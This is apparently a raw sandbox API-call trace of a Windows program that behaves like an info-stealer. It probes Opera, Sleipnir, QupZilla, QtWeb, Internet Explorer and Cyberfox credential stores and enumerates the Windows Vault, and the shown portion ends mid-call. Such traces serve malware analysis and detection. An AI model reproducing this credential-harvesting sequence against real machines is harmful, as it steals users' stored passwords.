[0126.584] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.585] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0126.585] GetProcessHeap () returned 0x6a0000 [0126.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb2) returned 0x6bcf08 [0126.585] GetProcessHeap () returned 0x6a0000 [0126.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.588] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0126.588] GetProcessHeap () returned 0x6a0000 [0126.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf08 | out: hHeap=0x6a0000) returned 1 [0126.589] GetProcessHeap () returned 0x6a0000 [0126.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.590] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.591] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0126.591] GetProcessHeap () returned 0x6a0000 [0126.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6bcee8 [0126.591] GetProcessHeap () returned 0x6a0000 [0126.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.593] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0126.593] GetProcessHeap () returned 0x6a0000 [0126.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcee8 | out: hHeap=0x6a0000) returned 1 [0126.594] GetProcessHeap () returned 0x6a0000 [0126.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.594] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.595] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 78 [0126.595] GetProcessHeap () returned 0x6a0000 [0126.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x6aa9a0 [0126.595] GetProcessHeap () returned 0x6a0000 [0126.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.597] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0126.597] GetProcessHeap () returned 0x6a0000 [0126.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.597] GetProcessHeap () returned 0x6a0000 [0126.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.598] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.599] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 95 [0126.599] GetProcessHeap () returned 0x6a0000 [0126.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2) returned 0x6aeb30 [0126.599] GetProcessHeap () returned 0x6a0000 [0126.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.600] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0126.601] GetProcessHeap () returned 0x6a0000 [0126.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aeb30 | out: hHeap=0x6a0000) returned 1 [0126.601] GetProcessHeap () returned 0x6a0000 [0126.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.602] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.603] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 93 [0126.603] GetProcessHeap () returned 0x6a0000 [0126.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x6bcf08 [0126.603] GetProcessHeap () returned 0x6a0000 [0126.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.604] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0126.604] GetProcessHeap () returned 0x6a0000 [0126.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf08 | out: hHeap=0x6a0000) returned 1 [0126.605] GetProcessHeap () returned 0x6a0000 [0126.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.605] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.606] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 76 [0126.606] GetProcessHeap () returned 0x6a0000 [0126.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9c) returned 0x6aa9a0 [0126.606] GetProcessHeap () returned 0x6a0000 [0126.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.608] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0126.608] GetProcessHeap () returned 0x6a0000 [0126.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa9a0 | out: hHeap=0x6a0000) returned 1 [0126.608] GetProcessHeap () returned 0x6a0000 [0126.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.609] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.610] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 84 [0126.610] GetProcessHeap () returned 0x6a0000 [0126.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xac) returned 0x6bcef8 [0126.610] GetProcessHeap () returned 0x6a0000 [0126.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.611] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0126.611] GetProcessHeap () returned 0x6a0000 [0126.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcef8 | out: hHeap=0x6a0000) returned 1 [0126.612] GetProcessHeap () returned 0x6a0000 [0126.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.613] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.613] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 118 [0126.613] GetProcessHeap () returned 0x6a0000 [0126.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf0) returned 0x6bcf10 [0126.613] GetProcessHeap () returned 0x6a0000 [0126.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.615] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0126.615] GetProcessHeap () returned 0x6a0000 [0126.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf10 | out: hHeap=0x6a0000) returned 1 [0126.616] GetProcessHeap () returned 0x6a0000 [0126.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.616] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.617] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0126.617] GetProcessHeap () returned 0x6a0000 [0126.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xec) returned 0x6bcf08 [0126.617] GetProcessHeap () returned 0x6a0000 [0126.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.618] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0126.619] GetProcessHeap () returned 0x6a0000 [0126.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf08 | out: hHeap=0x6a0000) returned 1 [0126.619] GetProcessHeap () returned 0x6a0000 [0126.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.620] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.621] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0126.621] GetProcessHeap () returned 0x6a0000 [0126.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xca) returned 0x6bcee8 [0126.621] GetProcessHeap () returned 0x6a0000 [0126.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.625] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0126.625] GetProcessHeap () returned 0x6a0000 [0126.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcee8 | out: hHeap=0x6a0000) returned 1 [0126.626] GetProcessHeap () returned 0x6a0000 [0126.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.627] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.627] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0126.627] GetProcessHeap () returned 0x6a0000 [0126.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xda) returned 0x6bcef8 [0126.628] GetProcessHeap () returned 0x6a0000 [0126.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.629] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0126.629] GetProcessHeap () returned 0x6a0000 [0126.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcef8 | out: hHeap=0x6a0000) returned 1 [0126.630] GetProcessHeap () returned 0x6a0000 [0126.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.630] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.631] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0126.631] GetProcessHeap () returned 0x6a0000 [0126.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf2) returned 0x6bcf10 [0126.631] GetProcessHeap () returned 0x6a0000 [0126.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.632] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0126.633] GetProcessHeap () returned 0x6a0000 [0126.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf10 | out: hHeap=0x6a0000) returned 1 [0126.633] GetProcessHeap () returned 0x6a0000 [0126.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.634] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.635] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0126.635] GetProcessHeap () returned 0x6a0000 [0126.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x6bcf08 [0126.635] GetProcessHeap () returned 0x6a0000 [0126.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.637] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0126.637] GetProcessHeap () returned 0x6a0000 [0126.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf08 | out: hHeap=0x6a0000) returned 1 [0126.637] GetProcessHeap () returned 0x6a0000 [0126.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.638] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.639] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0126.639] GetProcessHeap () returned 0x6a0000 [0126.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xcc) returned 0x6bcee8 [0126.639] GetProcessHeap () returned 0x6a0000 [0126.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.640] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0126.641] GetProcessHeap () returned 0x6a0000 [0126.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcee8 | out: hHeap=0x6a0000) returned 1 [0126.641] GetProcessHeap () returned 0x6a0000 [0126.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.642] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.643] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0126.643] GetProcessHeap () returned 0x6a0000 [0126.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xdc) returned 0x6bcef8 [0126.643] GetProcessHeap () returned 0x6a0000 [0126.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.645] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0126.645] GetProcessHeap () returned 0x6a0000 [0126.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcef8 | out: hHeap=0x6a0000) returned 1 [0126.645] GetProcessHeap () returned 0x6a0000 [0126.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6b8f80 [0126.645] GetProcessHeap () returned 0x6a0000 [0126.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab460 [0126.645] GetProcessHeap () returned 0x6a0000 [0126.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6a6698 [0126.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0126.647] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x6a6698 | out: phkResult=0x6a6698*=0x0) returned 0x2 [0126.647] GetProcessHeap () returned 0x6a0000 [0126.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a6698 | out: hHeap=0x6a0000) returned 1 [0126.647] GetProcessHeap () returned 0x6a0000 [0126.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.647] GetProcessHeap () returned 0x6a0000 [0126.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x6a0000) returned 1 [0126.648] GetProcessHeap () returned 0x6a0000 [0126.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6b8f80 [0126.648] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0126.649] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6b8f80 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0126.649] GetProcessHeap () returned 0x6a0000 [0126.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f94) returned 0x6b9190 [0126.650] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.650] wvsprintfW (in: param_1=0x6b9190, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0126.650] GetProcessHeap () returned 0x6a0000 [0126.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9a) returned 0x6aa3b8 [0126.650] GetProcessHeap () returned 0x6a0000 [0126.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9190 | out: hHeap=0x6a0000) returned 1 [0126.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.652] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0126.652] GetProcessHeap () returned 0x6a0000 [0126.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aa3b8 | out: hHeap=0x6a0000) returned 1 [0126.653] GetProcessHeap () returned 0x6a0000 [0126.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.675] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6cf40000 [0127.753] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultEnumerateItems") returned 0x6cf4b960 [0127.754] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultEnumerateVaults") returned 0x6cf63510 [0127.754] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultFree") returned 0x6cf57050 [0127.755] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultGetItem") returned 0x6cf4bb70 [0127.756] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultGetItem") returned 0x6cf4bb70 [0127.756] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultOpenVault") returned 0x6cf4bc10 [0127.757] GetProcAddress (hModule=0x6cf40000, lpProcName="VaultCloseVault") returned 0x6cf4bc90 [0127.758] GetVersionExW (in: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x508c490b, dwMinorVersion=0x19fb5c, dwBuildNumber=0x0, dwPlatformId=0x408323, szCSDVersion="길j쾓瞆") | out: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0127.758] VaultEnumerateVaults () returned 0x0 [0127.767] GetProcessHeap () returned 0x6a0000 [0127.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bac30 [0127.767] GetProcessHeap () returned 0x6a0000 [0127.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab3d0 [0127.768] VaultOpenVault () returned 0x0 [0127.768] VaultEnumerateItems () returned 0x0 [0127.834] VaultFree () returned 0x0 [0127.834] VaultCloseVault () returned 0x6 [0127.838] VaultOpenVault () returned 0x0 [0127.838] VaultEnumerateItems () returned 0x0 [0127.843] VaultFree () returned 0x0 [0127.843] VaultCloseVault () returned 0x6 [0127.844] GetProcessHeap () returned 0x6a0000 [0127.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.845] GetProcessHeap () returned 0x6a0000 [0127.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x6a0000) returned 1 [0127.845] GetProcessHeap () returned 0x6a0000 [0127.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bac30 [0127.845] GetProcessHeap () returned 0x6a0000 [0127.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0127.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0127.847] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0x19fbb8 | out: phkResult=0x19fbb8*=0x0) returned 0x2 [0127.847] GetProcessHeap () returned 0x6a0000 [0127.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.848] GetProcessHeap () returned 0x6a0000 [0127.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0127.848] GetProcessHeap () returned 0x6a0000 [0127.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0127.849] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0127.849] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0127.849] GetProcessHeap () returned 0x6a0000 [0127.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f50) returned 0x6bb458 [0127.857] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0127.858] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Opera", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0127.858] GetProcessHeap () returned 0x6a0000 [0127.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5a) returned 0x6b96c8 [0127.858] GetProcessHeap () returned 0x6a0000 [0127.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0127.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.860] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0127.860] GetProcessHeap () returned 0x6a0000 [0127.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.861] GetProcessHeap () returned 0x6a0000 [0127.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b96c8 | out: hHeap=0x6a0000) returned 1 [0127.861] GetProcessHeap () returned 0x6a0000 [0127.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0127.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.862] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fba4*=0x104) returned 0x2 [0127.863] GetProcessHeap () returned 0x6a0000 [0127.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.863] GetProcessHeap () returned 0x6a0000 [0127.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0127.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0127.864] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fba4*=0x104) returned 0x2 [0127.864] GetProcessHeap () returned 0x6a0000 [0127.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0127.865] GetProcessHeap () returned 0x6a0000 [0127.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0127.866] LoadLibraryW 